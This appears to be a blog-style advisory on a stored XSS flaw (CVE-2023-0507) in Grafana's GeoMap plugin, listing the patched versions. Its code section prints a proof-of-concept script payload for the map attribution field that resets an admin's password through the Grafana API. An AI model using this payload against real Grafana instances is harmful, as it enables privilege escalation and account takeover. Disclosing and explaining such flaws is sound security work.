Grafana, a popular open-source platform for monitoring and observability, has been discovered to have a stored Cross-Site Scripting (XSS) vulnerability (CVE-2023-0507) in its core GeoMap plugin starting from the 8.1 branch. The vulnerability allows an attacker to execute arbitrary JavaScript code within the context of the currently authorized user of the Grafana instance. This means that a user with an Editor role can potentially escalate their privileges to those of an Admin role if the Admin user executes the malicious JavaScript code while viewing a dashboard. In this post, we'll discuss the details of this vulnerability, provide a code snippet for demonstrating the potential exploit, and provide links to original references.

Exploit Details

The stored XSS vulnerability in Grafana's GeoMap plugin was possible due to map attributions not being properly sanitized, which allowed arbitrary JavaScript code to be injected and executed. An attacker needs to have the Editor role to change a panel to include a map attribution containing the malicious JavaScript code. This code, when executed by a user with Admin role, can potentially allow the attacker to change the Admin user's password, thus escalating their privileges.

Code Snippet

Here's an example code snippet that demonstrates how the stored XSS vulnerability can be exploited:

// Malicious JavaScript code injected in the map attribution
<script>
    // Code to change password of user with Admin role
    var newPassword = "newAdminPassword"; // Replace with desired password
    var targetUsername = "admin"; // Replace with the targeted admin username

    // Post the form with the new password for the targeted admin user
    $.ajax({
        url: "/api/users/" + targetUsername + "/password",
        type: "PUT",
        dataType: "json",
        contentType: "application/json",
        data: JSON.stringify({ "newPassword": newPassword })
    }).done(function() {
        console.log("Password changed for user: " + targetUsername);
    });
</script>

Patch & Mitigation

Grafana has released fixed versions (8.5.21, 9.2.13, and 9.3.8) that address this vulnerability. Users are advised to upgrade to one of these versions to mitigate the risk of exploitation.

Original References

1. Grafana Release Notes - Fixed versions
2. CVE-2023-0507

Conclusion

The stored XSS vulnerability in Grafana's GeoMap plugin allows attackers with Editor roles to escalate their privileges if an Admin user executes the injected malicious JavaScript code while viewing a dashboard. To eliminate the risk of exploitation, users should upgrade their Grafana instances to versions 8.5.21, 9.2.13, or 9.3.8.

Timeline

Published on: 03/01/2023 16:15:00 UTC
Last modified on: 03/09/2023 01:08:00 UTC